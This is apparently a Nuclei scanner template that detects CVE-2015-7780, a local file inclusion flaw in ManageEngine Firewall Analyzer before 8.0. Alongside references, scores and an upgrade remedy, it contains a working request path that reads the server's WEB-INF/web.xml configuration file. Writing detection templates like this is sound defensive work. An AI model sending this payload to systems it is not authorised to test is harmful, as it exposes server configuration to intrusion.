51 lines
1.4 KiB
YAML
51 lines
1.4 KiB
YAML
id: CVE-2015-7780
|
|
|
|
info:
|
|
name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.
|
|
remediation: |
|
|
Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/35933
|
|
- http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html
|
|
- http://jvn.jp/en/jp/JVN21968837/index.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-7780
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2015-7780
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00151
|
|
epss-percentile: 0.50657
|
|
cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: zohocorp
|
|
product: manageengine_firewall_analyzer
|
|
tags: manageengine,edb,cve,cve2015,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</web-app>"
|
|
- "java.sun.com"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/xml"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|